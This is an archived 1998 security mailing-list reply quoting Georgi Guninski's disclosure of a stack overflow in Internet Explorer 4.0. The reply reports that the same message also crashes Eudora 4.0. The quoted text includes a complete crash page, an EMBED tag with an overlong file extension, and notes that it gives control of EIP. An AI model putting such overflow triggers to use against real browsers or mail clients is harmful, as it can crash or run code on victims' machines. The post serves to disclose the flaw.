On Fri, 20 Mar 1998, Georgi Guninski wrote: Hi! This not only crashes MSIE4 but also Eudora4.0 (yes the mail reader...) I can't read this mail with out a crash. I had to read it in pine on a unix system. Cheers Christian > Microsoft Internet Explorer 4.0 (don't know for other versions) > can be crashed and eventually made execute arbitrary code > with a little help of the <EMBED> tag. > > The following: > <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________> > opens a dialog box and closes IE 4.0. > It seems that the long file extension causes stack overrun. > > The stack is smashed - full with our values, EIP is also ours and CS=SS. > So probably a string could be constructed, executing code at the > client's machine. > > Solution: Do not browse hostile pages. > To try this: http://www.geocities.com/ResearchTriangle/1711/msie.html > > > Georgi Guninski > http://www.geocities.com/ResearchTriangle/1711 > > -----------------------cut here and save as > crashmsie.html--------------------- > <HTML> > Trying to crash IE 4.0 > <EMBED > SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789> > 40 > 80 160 170 180 190 200 > </HTML> > Mvh Christian /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ | Christian Holmqvist | | Email: pt95choat_private-r.se | | Tele: 0457-17754 | \________________________________/
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:46:25 PDT